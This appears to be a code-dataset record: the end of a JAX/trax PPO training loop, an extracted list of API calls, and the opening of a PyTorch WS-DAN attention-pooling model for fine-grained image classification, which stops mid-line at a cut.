avg_reward = evaluate_policy( eval_env, get_predictions, boundary, max_timestep=max_timestep_eval, rng=key) for k, v in avg_reward.items(): eval_sw.scalar("eval/mean_reward/%s" % k, v, step=i) logging.info("Epoch [% 6d] Policy Evaluation [%s] = %10.2f", i, k, v) policy_eval_time = get_time(policy_eval_start_time) trajectory_collection_start_time = time.time() logging.vlog(1, "Epoch [% 6d] collecting trajectories.", i) jax_rng_key, key = jax_random.split(jax_rng_key) trajs, num_done = collect_trajectories( env, policy_fun=get_predictions, num_trajectories=batch_size, max_timestep=max_timestep, boundary=boundary, rng=key, reset=(i == 0) or restore, epsilon=(10.0 / (i + 10.0))) # this is a different epsilon. trajectory_collection_time = get_time(trajectory_collection_start_time) logging.vlog(1, "Collecting trajectories took %0.2f msec.", trajectory_collection_time) avg_reward = float(sum(np.sum(traj[2]) for traj in trajs)) / len(trajs) max_reward = max(np.sum(traj[2]) for traj in trajs) min_reward = min(np.sum(traj[2]) for traj in trajs) train_sw.scalar("train/mean_reward", avg_reward, step=i) logging.vlog(1, "Rewards avg=[%0.2f], max=[%0.2f], min=[%0.2f], all=%s", avg_reward, max_reward, min_reward, [float(np.sum(traj[2])) for traj in trajs]) logging.vlog(1, "Trajectory Length average=[%0.2f], max=[%0.2f], min=[%0.2f]", float(sum(len(traj[0]) for traj in trajs)) / len(trajs), max(len(traj[0]) for traj in trajs), min(len(traj[0]) for traj in trajs)) logging.vlog(2, "Trajectory Lengths: %s", [len(traj[0]) for traj in trajs]) padding_start_time = time.time() (_, reward_mask, padded_observations, padded_actions, padded_rewards) = pad_trajectories( trajs, boundary=boundary) padding_time = get_time(padding_start_time) logging.vlog(1, "Padding trajectories took %0.2f msec.", get_time(padding_start_time)) logging.vlog(1, "Padded Observations' shape [%s]", str(padded_observations.shape)) logging.vlog(1, "Padded Actions' shape [%s]", str(padded_actions.shape)) logging.vlog(1, "Padded Rewards' shape [%s]", str(padded_rewards.shape)) # Calculate log-probabilities and value predictions of the trajectories. # We'll pass these to the loss functions so as to not get recomputed. # NOTE: # There is a slight problem here, if the policy network contains # stochasticity in the log-probabilities (ex: dropout), then calculating # these again here is not going to be correct and should be done in the # collect function. log_prob_recompute_start_time = time.time() jax_rng_key, key = jax_random.split(jax_rng_key) log_probabs_traj, value_predictions_traj, _ = get_predictions( padded_observations, rng=key) log_prob_recompute_time = get_time(log_prob_recompute_start_time) # Some assertions. B, T = padded_actions.shape # pylint: disable=invalid-name assert (B, T) == padded_rewards.shape assert (B, T) == reward_mask.shape assert (B, T + 1) == padded_observations.shape[:2] assert (B, T + 1) + env.observation_space.shape == padded_observations.shape # Linear annealing from 0.1 to 0.0 # epsilon_schedule = epsilon if epochs == 1 else epsilon * (1.0 - # (i / # (epochs - 1))) # Constant epsilon. epsilon_schedule = epsilon # Compute value and ppo losses. jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2) logging.vlog(2, "Starting to compute P&V loss.") loss_compute_start_time = time.time() cur_combined_loss, cur_ppo_loss, cur_value_loss, entropy_bonus = ( combined_loss( policy_and_value_net_params, log_probabs_traj, value_predictions_traj, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon_schedule, c1=c1, c2=c2, rng=key1)) loss_compute_time = get_time(loss_compute_start_time) logging.vlog( 1, "Calculating P&V loss [%10.2f(%10.2f, %10.2f, %10.2f)] took %0.2f msec.", cur_combined_loss, cur_value_loss, cur_ppo_loss, entropy_bonus, get_time(loss_compute_start_time)) jax_rng_key, key1 = jax_random.split(jax_rng_key, num=2) logging.vlog(1, "Policy and Value Optimization") optimization_start_time = time.time() keys = jax_random.split(key1, num=num_optimizer_steps) for j in range(num_optimizer_steps): k1, k2, k3 = jax_random.split(keys[j], num=3) t = time.time() # Update the optimizer state. policy_and_value_opt_state = policy_and_value_opt_step( j, policy_and_value_opt_state, policy_and_value_opt_update, policy_and_value_get_params, policy_and_value_net_apply, log_probabs_traj, value_predictions_traj, padded_observations, padded_actions, padded_rewards, reward_mask, c1=c1, c2=c2, gamma=gamma, lambda_=lambda_, epsilon=epsilon_schedule, rng=k1) # Compute the approx KL for early stopping. new_policy_and_value_net_params = policy_and_value_get_params( policy_and_value_opt_state) log_probab_actions_new, _ = policy_and_value_net_apply( padded_observations, new_policy_and_value_net_params, rng=k2) approx_kl = approximate_kl(log_probab_actions_new, log_probabs_traj, reward_mask) early_stopping = enable_early_stopping and approx_kl > 1.5 * target_kl if early_stopping: logging.vlog( 1, "Early stopping policy and value optimization at iter: %d, " "with approx_kl: %0.2f", j, approx_kl) # We don't return right-away, we want the below to execute on the last # iteration. t2 = time.time() if (((j + 1) % print_every_optimizer_steps == 0) or (j == num_optimizer_steps - 1) or early_stopping): # Compute and log the loss. (loss_combined, loss_ppo, loss_value, entropy_bonus) = ( combined_loss( new_policy_and_value_net_params, log_probabs_traj, value_predictions_traj, policy_and_value_net_apply, padded_observations, padded_actions, padded_rewards, reward_mask, gamma=gamma, lambda_=lambda_, epsilon=epsilon_schedule, c1=c1, c2=c2, rng=k3)) logging.vlog(1, "One Policy and Value grad desc took: %0.2f msec", get_time(t, t2)) logging.vlog( 1, "Combined Loss(value, ppo, entropy_bonus) [%10.2f] ->" " [%10.2f(%10.2f,%10.2f,%10.2f)]", cur_combined_loss, loss_combined, loss_value, loss_ppo, entropy_bonus) if early_stopping: break optimization_time = get_time(optimization_start_time) logging.vlog( 1, "Total Combined Loss reduction [%0.2f]%%", (100 * (cur_combined_loss - loss_combined) / np.abs(cur_combined_loss))) # Save parameters every time we see the end of at least a fraction of batch # number of trajectories that are done (not completed -- completed includes # truncated and done). # Also don't save too frequently, enforce a minimum gap. # Or if this is the last iteration. policy_save_start_time = time.time() num_trajectories_done += num_done if (((num_trajectories_done >= done_frac_for_policy_save * batch_size) and (i - last_saved_at > eval_every_n)) or (i == epochs - 1)): logging.vlog(1, "Epoch [% 6d] saving model.", i) params_file = os.path.join(output_dir, "model-%06d.pkl" % i) with gfile.GFile(params_file, "wb") as f: pickle.dump(policy_and_value_net_params, f) # Reset this number. num_trajectories_done = 0 last_saved_at = i policy_save_time = get_time(policy_save_start_time) epoch_time = get_time(epoch_start_time) logging.info( "Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined" " Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]", i, min_reward, max_reward, avg_reward, loss_combined, loss_value, loss_ppo, entropy_bonus) timing_dict = { "epoch": epoch_time, "policy_eval": policy_eval_time, "trajectory_collection": trajectory_collection_time, "padding": padding_time, "log_prob_recompute": log_prob_recompute_time, "loss_compute": loss_compute_time, "optimization": optimization_time, "policy_save": policy_save_time, } for k, v in timing_dict.items(): timing_sw.scalar("timing/%s" % k, v, step=i) max_key_len = max(len(k) for k in timing_dict) timing_info_list = [ "%s : % 10.2f" % (k.rjust(max_key_len + 1), v) for k, v in sorted(timing_dict.items()) ] logging.info("Epoch [% 6d], Timings: \n%s", i, "\n".join(timing_info_list)) # Reset restore. restore = False # Flush summary writers once in a while. if (i+1) % 1000 == 0 or i == epochs - 1: train_sw.flush() timing_sw.flush() eval_sw.flush()
[((576, 1, 576, 44), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n'), ((611, 1, 611, 49), 'functools.partial', 'functools.partial', (), '', False, 'import functools\n'), ((121, 8, 121, 71), 'tensor2tensor.trax.optimizers.Adam', 'trax_opt.Adam', (), '', True, 'from tensor2tensor.trax import optimizers as trax_opt\n'), ((170, 9, 179, 14), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (), '', False, 'from tensor2tensor.envs import env_problem_utils\n'), ((355, 21, 355, 57), 'jax.numpy.squeeze', 'np.squeeze', (), '', True, 'from jax import numpy as np\n'), ((479, 9, 479, 57), 'jax.numpy.clip', 'np.clip', ({(479, 17, 479, 30): 'probab_ratios', (479, 32, 479, 43): '(1 - epsilon)', (479, 45, 479, 56): '(1 + epsilon)'}, {}), '(probab_ratios, 1 - epsilon, 1 + epsilon)', True, 'from jax import numpy as np\n'), ((743, 24, 743, 52), 'os.path.basename', 'os.path.basename', ({(743, 41, 743, 51): 'model_file'}, {}), '(model_file)', False, 'import os\n'), ((780, 2, 780, 28), 'tensorflow.io.gfile.makedirs', 'gfile.makedirs', ({(780, 17, 780, 27): 'output_dir'}, {}), '(output_dir)', False, 'from tensorflow.io import gfile\n'), ((791, 16, 791, 74), 'tensor2tensor.trax.trax.get_random_number_generator_and_set_seed', 'trax.get_random_number_generator_and_set_seed', ({(791, 62, 791, 73): 'random_seed'}, {}), '(random_seed)', False, 'from tensor2tensor.trax import trax\n'), ((800, 22, 800, 58), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((816, 31, 816, 62), 'jax.jit', 'jit', ({(816, 35, 816, 61): 'policy_and_value_net_apply'}, {}), '(policy_and_value_net_apply)', False, 'from jax import jit\n'), ((827, 2, 827, 49), 'absl.logging.info', 'logging.info', ({(827, 15, 827, 48): '"""Starting the PPO training loop."""'}, {}), "('Starting the PPO training loop.')", False, 'from absl import logging\n'), ((104, 10, 104, 31), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', ({(104, 24, 104, 30): '*tower'}, {}), '(*tower)', False, 'from tensor2tensor.trax import layers\n'), ((191, 20, 191, 31), 'jax.numpy.uint8', 'np.uint8', ({(191, 29, 191, 30): '0'}, {}), '(0)', True, 'from jax import numpy as np\n'), ((256, 17, 256, 58), 'jax.lax.pad', 'lax.pad', ({(256, 25, 256, 26): 'o', (256, 28, 256, 41): 'padding_value', (256, 43, 256, 57): 'padding_config'}, {}), '(o, padding_value, padding_config)', False, 'from jax import lax\n'), ((263, 20, 263, 68), 'jax.lax.pad', 'lax.pad', ({(263, 28, 263, 29): 'a', (263, 31, 263, 51): 'action_padding_value', (263, 53, 263, 67): 'padding_config'}, {}), '(a, action_padding_value, padding_config)', False, 'from jax import lax\n'), ((265, 20, 265, 68), 'jax.lax.pad', 'lax.pad', ({(265, 28, 265, 29): 'r', (265, 31, 265, 51): 'reward_padding_value', (265, 53, 265, 67): 'padding_config'}, {}), '(r, reward_padding_value, padding_config)', False, 'from jax import lax\n'), ((269, 18, 269, 50), 'numpy.ones_like', 'onp.ones_like', (), '', True, 'import numpy as onp\n'), ((272, 25, 272, 47), 'jax.numpy.stack', 'np.stack', ({(272, 34, 272, 46): 'reward_masks'}, {}), '(reward_masks)', True, 'from jax import numpy as np\n'), ((272, 49, 273, 26), 'jax.numpy.stack', 'np.stack', ({(273, 6, 273, 25): 'padded_observations'}, {}), '(padded_observations)', True, 'from jax import numpy as np\n'), ((273, 28, 273, 52), 'jax.numpy.stack', 'np.stack', ({(273, 37, 273, 51): 'padded_actions'}, {}), '(padded_actions)', True, 'from jax import numpy as np\n'), ((273, 54, 273, 78), 'jax.numpy.stack', 'np.stack', ({(273, 63, 273, 77): 'padded_rewards'}, {}), '(padded_rewards)', True, 'from jax import numpy as np\n'), ((325, 17, 325, 39), 'jax.numpy.stack', 'np.stack', (), '', True, 'from jax import numpy as np\n'), ((362, 27, 362, 67), 'jax.numpy.squeeze', 'np.squeeze', (), '', True, 'from jax import numpy as np\n'), ((368, 11, 368, 43), 'jax.numpy.maximum', 'np.maximum', ({(368, 22, 368, 36): 'v_clipped_loss', (368, 38, 368, 42): 'loss'}, {}), '(v_clipped_loss, loss)', True, 'from jax import numpy as np\n'), ((371, 9, 371, 21), 'jax.numpy.sum', 'np.sum', ({(371, 16, 371, 20): 'loss'}, {}), '(loss)', True, 'from jax import numpy as np\n'), ((371, 24, 371, 43), 'jax.numpy.sum', 'np.sum', ({(371, 31, 371, 42): 'reward_mask'}, {}), '(reward_mask)', True, 'from jax import numpy as np\n'), ((473, 18, 473, 45), 'jax.numpy.exp', 'np.exp', ({(473, 25, 473, 44): '(logp_new - logp_old)'}, {}), '(logp_new - logp_old)', True, 'from jax import numpy as np\n'), ((511, 6, 511, 47), 'jax.numpy.squeeze', 'np.squeeze', (), '', True, 'from jax import numpy as np\n'), ((521, 52, 521, 70), 'jax.numpy.std', 'np.std', ({(521, 59, 521, 69): 'advantages'}, {}), '(advantages)', True, 'from jax import numpy as np\n'), ((534, 22, 534, 39), 'jax.numpy.sum', 'np.sum', ({(534, 29, 534, 38): 'objective'}, {}), '(objective)', True, 'from jax import numpy as np\n'), ((534, 42, 534, 61), 'jax.numpy.sum', 'np.sum', ({(534, 49, 534, 60): 'reward_mask'}, {}), '(reward_mask)', True, 'from jax import numpy as np\n'), ((652, 6, 652, 33), 'jax.grad', 'grad', ({(652, 11, 652, 32): 'policy_and_value_loss'}, {}), '(policy_and_value_loss)', False, 'from jax import grad\n'), ((659, 9, 659, 20), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((680, 9, 680, 21), 'jax.numpy.sum', 'np.sum', ({(680, 16, 680, 20): 'diff'}, {}), '(diff)', True, 'from jax import numpy as np\n'), ((680, 24, 680, 36), 'jax.numpy.sum', 'np.sum', ({(680, 31, 680, 35): 'mask'}, {}), '(mask)', True, 'from jax import numpy as np\n'), ((697, 6, 697, 16), 'jax.numpy.exp', 'np.exp', ({(697, 13, 697, 15): 'lp'}, {}), '(lp)', True, 'from jax import numpy as np\n'), ((714, 15, 721, 16), 'tensor2tensor.envs.env_problem_utils.play_env_problem_with_policy', 'env_problem_utils.play_env_problem_with_policy', (), '', False, 'from tensor2tensor.envs import env_problem_utils\n'), ((738, 27, 738, 71), 'os.path.join', 'os.path.join', ({(738, 40, 738, 50): 'output_dir', (738, 52, 738, 70): '"""model-??????.pkl"""'}, {}), "(output_dir, 'model-??????.pkl')", False, 'import os\n'), ((745, 7, 745, 36), 'tensorflow.io.gfile.GFile', 'gfile.GFile', ({(745, 19, 745, 29): 'model_file', (745, 31, 745, 35): '"""rb"""'}, {}), "(model_file, 'rb')", False, 'from tensorflow.io import gfile\n'), ((746, 34, 746, 48), 'pickle.load', 'pickle.load', ({(746, 46, 746, 47): 'f'}, {}), '(f)', False, 'import pickle\n'), ((783, 36, 783, 69), 'os.path.join', 'os.path.join', ({(783, 49, 783, 59): 'output_dir', (783, 61, 783, 68): '"""train"""'}, {}), "(output_dir, 'train')", False, 'import os\n'), ((784, 37, 784, 71), 'os.path.join', 'os.path.join', ({(784, 50, 784, 60): 'output_dir', (784, 62, 784, 70): '"""timing"""'}, {}), "(output_dir, 'timing')", False, 'import os\n'), ((785, 35, 785, 67), 'os.path.join', 'os.path.join', ({(785, 48, 785, 58): 'output_dir', (785, 60, 785, 66): '"""eval"""'}, {}), "(output_dir, 'eval')", False, 'import os\n'), ((812, 4, 812, 70), 'absl.logging.info', 'logging.info', ({(812, 17, 812, 58): '"""Restored parameters from iteration [%d]"""', (812, 60, 812, 69): 'iteration'}, {}), "('Restored parameters from iteration [%d]', iteration)", False, 'from absl import logging\n'), ((829, 23, 829, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((846, 29, 846, 40), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((863, 39, 863, 50), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((864, 4, 864, 63), 'absl.logging.vlog', 'logging.vlog', ({(864, 17, 864, 18): '(1)', (864, 20, 864, 59): '"""Epoch [% 6d] collecting trajectories."""', (864, 61, 864, 62): 'i'}, {}), "(1, 'Epoch [% 6d] collecting trajectories.', i)", False, 'from absl import logging\n'), ((865, 23, 865, 52), 'jax.random.split', 'jax_random.split', ({(865, 40, 865, 51): 'jax_rng_key'}, {}), '(jax_rng_key)', True, 'from jax import random as jax_random\n'), ((877, 4, 878, 44), 'absl.logging.vlog', 'logging.vlog', ({(877, 17, 877, 18): '(1)', (877, 20, 877, 62): '"""Collecting trajectories took %0.2f msec."""', (878, 17, 878, 43): 'trajectory_collection_time'}, {}), "(1, 'Collecting trajectories took %0.2f msec.',\n trajectory_collection_time)", False, 'from absl import logging\n'), ((897, 25, 897, 36), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((919, 36, 919, 47), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((920, 23, 920, 52), 'jax.random.split', 'jax_random.split', ({(920, 40, 920, 51): 'jax_rng_key'}, {}), '(jax_rng_key)', True, 'from jax import random as jax_random\n'), ((941, 24, 941, 60), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((942, 4, 942, 52), 'absl.logging.vlog', 'logging.vlog', ({(942, 17, 942, 18): '(2)', (942, 20, 942, 51): '"""Starting to compute P&V loss."""'}, {}), "(2, 'Starting to compute P&V loss.')", False, 'from absl import logging\n'), ((943, 30, 943, 41), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((967, 24, 967, 60), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((968, 4, 968, 52), 'absl.logging.vlog', 'logging.vlog', ({(968, 17, 968, 18): '(1)', (968, 20, 968, 51): '"""Policy and Value Optimization"""'}, {}), "(1, 'Policy and Value Optimization')", False, 'from absl import logging\n'), ((969, 30, 969, 41), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((970, 11, 970, 58), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((1053, 29, 1053, 40), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1068, 4, 1072, 22), 'absl.logging.info', 'logging.info', ({(1069, 8, 1070, 63): '"""Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]"""', (1070, 65, 1070, 66): 'i', (1070, 68, 1070, 78): 'min_reward', (1071, 8, 1071, 18): 'max_reward', (1071, 20, 1071, 30): 'avg_reward', (1071, 32, 1071, 45): 'loss_combined', (1071, 47, 1071, 57): 'loss_value', (1071, 59, 1071, 67): 'loss_ppo', (1072, 8, 1072, 21): 'entropy_bonus'}, {}), "(\n 'Epoch [% 6d], Reward[min, max, avg] [%5.2f,%5.2f,%5.2f], Combined Loss(value, ppo, entropy) [%2.5f(%2.5f,%2.5f,%2.5f)]'\n , i, min_reward, max_reward, avg_reward, loss_combined, loss_value,\n loss_ppo, entropy_bonus)", False, 'from absl import logging\n'), ((113, 8, 113, 30), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', ({(113, 22, 113, 29): '*tower1'}, {}), '(*tower1)', False, 'from tensor2tensor.trax import layers\n'), ((114, 8, 114, 30), 'tensor2tensor.trax.layers.Serial', 'layers.Serial', ({(114, 22, 114, 29): '*tower2'}, {}), '(*tower2)', False, 'from tensor2tensor.trax import layers\n'), ((193, 20, 193, 32), 'jax.numpy.uint16', 'np.uint16', ({(193, 30, 193, 31): '0'}, {}), '(0)', True, 'from jax import numpy as np\n'), ((270, 24, 270, 63), 'jax.lax.pad', 'lax.pad', ({(270, 32, 270, 43): 'reward_mask', (270, 45, 270, 46): '(0)', (270, 48, 270, 62): 'padding_config'}, {}), '(reward_mask, 0, padding_config)', False, 'from jax import lax\n'), ((365, 39, 366, 67), 'jax.numpy.clip', 'np.clip', ({(366, 8, 366, 47): '(value_prediction - value_prediction_old)', (366, 49, 366, 57): '(-epsilon)', (366, 59, 366, 66): 'epsilon'}, {}), '(value_prediction - value_prediction_old, -epsilon, epsilon)', True, 'from jax import numpy as np\n'), ((400, 9, 400, 20), 'jax.numpy.array', 'np.array', ({(400, 18, 400, 19): 'd'}, {}), '(d)', True, 'from jax import numpy as np\n'), ((521, 29, 521, 48), 'jax.numpy.mean', 'np.mean', ({(521, 37, 521, 47): 'advantages'}, {}), '(advantages)', True, 'from jax import numpy as np\n'), ((699, 11, 699, 25), 'jax.numpy.sum', 'np.sum', ({(699, 18, 699, 24): '(lp * p)'}, {}), '(lp * p)', True, 'from jax import numpy as np\n'), ((699, 28, 699, 40), 'jax.numpy.sum', 'np.sum', ({(699, 35, 699, 39): 'mask'}, {}), '(mask)', True, 'from jax import numpy as np\n'), ((838, 18, 838, 46), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((848, 25, 848, 61), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((850, 6, 850, 59), 'absl.logging.vlog', 'logging.vlog', ({(850, 19, 850, 20): '(1)', (850, 22, 850, 55): '"""Epoch [% 6d] evaluating policy."""', (850, 57, 850, 58): 'i'}, {}), "(1, 'Epoch [% 6d] evaluating policy.', i)", False, 'from absl import logging\n'), ((972, 19, 972, 51), 'jax.random.split', 'jax_random.split', (), '', True, 'from jax import random as jax_random\n'), ((973, 10, 973, 21), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1012, 11, 1012, 22), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1057, 6, 1057, 54), 'absl.logging.vlog', 'logging.vlog', ({(1057, 19, 1057, 20): '(1)', (1057, 22, 1057, 50): '"""Epoch [% 6d] saving model."""', (1057, 52, 1057, 53): 'i'}, {}), "(1, 'Epoch [% 6d] saving model.', i)", False, 'from absl import logging\n'), ((1058, 20, 1058, 66), 'os.path.join', 'os.path.join', ({(1058, 33, 1058, 43): 'output_dir', (1058, 45, 1058, 65): "'model-%06d.pkl' % i"}, {}), "(output_dir, 'model-%06d.pkl' % i)", False, 'import os\n'), ((109, 19, 109, 44), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(109, 32, 109, 43): 'num_actions'}, {}), '(num_actions)', False, 'from tensor2tensor.trax import layers\n'), ((109, 46, 109, 65), 'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ({}, {}), '()', False, 'from tensor2tensor.trax import layers\n'), ((110, 19, 110, 34), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(110, 32, 110, 33): '(1)'}, {}), '(1)', False, 'from tensor2tensor.trax import layers\n'), ((243, 26, 243, 58), 'numpy.ones_like', 'onp.ones_like', (), '', True, 'import numpy as onp\n'), ((442, 52, 442, 64), 'jax.numpy.arange', 'np.arange', ({(442, 62, 442, 63): 'T'}, {}), '(T)', True, 'from jax import numpy as np\n'), ((860, 8, 860, 77), 'absl.logging.info', 'logging.info', ({(860, 21, 860, 67): '"""Epoch [% 6d] Policy Evaluation [%s] = %10.2f"""', (860, 69, 860, 70): 'i', (860, 72, 860, 73): 'k', (860, 75, 860, 76): 'v'}, {}), "('Epoch [% 6d] Policy Evaluation [%s] = %10.2f', i, k, v)", False, 'from absl import logging\n'), ((881, 21, 881, 36), 'jax.numpy.sum', 'np.sum', ({(881, 28, 881, 35): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((882, 21, 882, 36), 'jax.numpy.sum', 'np.sum', ({(882, 28, 882, 35): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((1006, 8, 1008, 50), 'absl.logging.vlog', 'logging.vlog', ({(1007, 12, 1007, 13): '(1)', (1007, 15, 1008, 35): '"""Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f"""', (1008, 37, 1008, 38): 'j', (1008, 40, 1008, 49): 'approx_kl'}, {}), "(1,\n 'Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f'\n , j, approx_kl)", False, 'from absl import logging\n'), ((1034, 8, 1037, 48), 'absl.logging.vlog', 'logging.vlog', ({(1035, 12, 1035, 13): '(1)', (1035, 15, 1036, 45): '"""Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]"""', (1036, 47, 1036, 64): 'cur_combined_loss', (1036, 66, 1036, 79): 'loss_combined', (1037, 12, 1037, 22): 'loss_value', (1037, 24, 1037, 32): 'loss_ppo', (1037, 34, 1037, 47): 'entropy_bonus'}, {}), "(1,\n 'Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]'\n , cur_combined_loss, loss_combined, loss_value, loss_ppo, entropy_bonus)", False, 'from absl import logging\n'), ((1046, 53, 1046, 78), 'jax.numpy.abs', 'np.abs', ({(1046, 60, 1046, 77): 'cur_combined_loss'}, {}), '(cur_combined_loss)', True, 'from jax import numpy as np\n'), ((1059, 11, 1059, 41), 'tensorflow.io.gfile.GFile', 'gfile.GFile', ({(1059, 23, 1059, 34): 'params_file', (1059, 36, 1059, 40): '"""wb"""'}, {}), "(params_file, 'wb')", False, 'from tensorflow.io import gfile\n'), ((1060, 8, 1060, 51), 'pickle.dump', 'pickle.dump', ({(1060, 20, 1060, 47): 'policy_and_value_net_params', (1060, 49, 1060, 50): 'f'}, {}), '(policy_and_value_net_params, f)', False, 'import pickle\n'), ((102, 12, 102, 27), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(102, 25, 102, 26): '(1)'}, {}), '(1)', False, 'from tensor2tensor.trax import layers\n'), ((442, 29, 442, 41), 'jax.numpy.arange', 'np.arange', ({(442, 39, 442, 40): 'B'}, {}), '(B)', True, 'from jax import numpy as np\n'), ((888, 24, 888, 39), 'jax.numpy.sum', 'np.sum', ({(888, 31, 888, 38): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((101, 26, 101, 51), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', ({(101, 39, 101, 50): 'num_actions'}, {}), '(num_actions)', False, 'from tensor2tensor.trax import layers\n'), ((101, 53, 101, 72), 'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ({}, {}), '()', False, 'from tensor2tensor.trax import layers\n'), ((723, 8, 723, 23), 'jax.numpy.sum', 'np.sum', ({(723, 15, 723, 22): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n'), ((880, 27, 880, 42), 'jax.numpy.sum', 'np.sum', ({(880, 34, 880, 41): 'traj[2]'}, {}), '(traj[2])', True, 'from jax import numpy as np\n')]
SudoRmFr/The-Nature-Conservancy-Fisheries-Monitoring
models/cal.py
059f0063c1493c19b4f45fa27d13adaeb6b2b2d7
""" WS-DAN models Hu et al., "See Better Before Looking Closer: Weakly Supervised Data Augmentation Network for Fine-Grained Visual Classification", arXiv:1901.09891 """ import logging import numpy as np import torch import torch.nn as nn import torch.nn.functional as F import models.resnet as resnet from models.inception import inception_v3, BasicConv2d import models.coatnet as coatnet import random __all__ = ['WSDAN_CAL'] EPSILON = 1e-6 def weights_init_classifier(m): classname = m.__class__.__name__ if classname.find('Linear') != -1: nn.init.normal_(m.weight, std=0.001) if m.bias: nn.init.constant_(m.bias, 0.0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Linear') != -1: nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out') nn.init.constant_(m.bias, 0.0) elif classname.find('Conv') != -1: nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in') if m.bias is not None: nn.init.constant_(m.bias, 0.0) elif classname.find('BatchNorm') != -1: if m.affine: nn.init.constant_(m.weight, 1.0) nn.init.constant_(m.bias, 0.0) # Bilinear Attention Pooling class BAP(nn.Module): def __init__(self, pool='GAP'): super(BAP, self).__init__() assert pool in ['GAP', 'GMP'] if pool == 'GAP': self.pool = None else: self.pool = nn.AdaptiveMaxPool2d(1) def forward(self, features, attentions): B, C, H, W = features.size() _, M, AH, AW = attentions.size() # match size if AH != H or AW != W: attentions = F.upsample_bilinear(attentions, size=(H, W)) # feature_matrix: (B, M, C) -> (B, M * C) if self.pool is None: feature_matrix = (torch.einsum('imjk,injk->imn', (attentions, features)) / float(H * W)).view(B, -1) else: feature_matrix = [] for i in range(M): AiF = self.pool(features * attentions[:, i:i + 1, ...]).view(B, -1) feature_matrix.append(AiF) feature_matrix = torch.cat(feature_matrix, dim=1) # sign-sqrt feature_matrix_raw = torch.sign(feature_matrix) * torch.sqrt(torch.abs(feature_matrix) + EPSILON) # l2 normalization along dimension M and C feature_matrix = F.normalize(feature_matrix_raw, dim=-1) if self.training: fake_att = torch.zeros_like(attentions).uniform_(0, 2) else: fake_att = torch.ones_like(attentions) counterfactual_feature = (torch.einsum('imjk,injk->imn', (fake_att, features)) / float(H * W)).view(B, -1) counterfactual_feature = torch.sign(counterfactual_feature) * torch.sqrt(torch.abs(counterfactual_feature) + EPSILON) counterfactual_feature = F.normalize(counterfactual_feature, dim=-1) return feature_matrix, counterfactual_feature def batch_augment(images, attention_map, mode='crop', theta=0.5, padding_ratio=0.1): batches, _, imgH, imgW = images.size() if mode == 'crop': crop_images = [] for batch_index in range(batches): atten_map = attention_map[batch_index:batch_index + 1] if isinstance(theta, tuple): theta_c = random.uniform(*theta) * atten_map.max() else: theta_c = theta * atten_map.max() crop_mask = F.upsample_bilinear(atten_map, size=(imgH, imgW)) >= theta_c nonzero_indices = torch.nonzero(crop_mask[0, 0, ...]) height_min = max(int(nonzero_indices[:, 0].min().item() - padding_ratio * imgH), 0) height_max = min(int(nonzero_indices[:, 0].max().item() + padding_ratio * imgH), imgH) width_min = max(int(nonzero_indices[:, 1].min().item() - padding_ratio * imgW), 0) width_max = min(int(nonzero_indices[:, 1].max().item() + padding_ratio * imgW), imgW) crop_images.append( F.upsample_bilinear(images[batch_index:batch_index + 1, :, height_min:height_max, width_min:width_max], size=(imgH, imgW))) crop_images = torch.cat(crop_images, dim=0) return crop_images elif mode == 'drop': drop_masks = [] for batch_index in range(batches): atten_map = attention_map[batch_index:batch_index + 1] if isinstance(theta, tuple): theta_d = random.uniform(*theta) * atten_map.max() else: theta_d = theta * atten_map.max() drop_masks.append(F.upsample_bilinear(atten_map, size=(imgH, imgW)) < theta_d) drop_masks = torch.cat(drop_masks, dim=0) drop_images = images * drop_masks.float() return drop_images else: raise ValueError('Expected mode in [\'crop\', 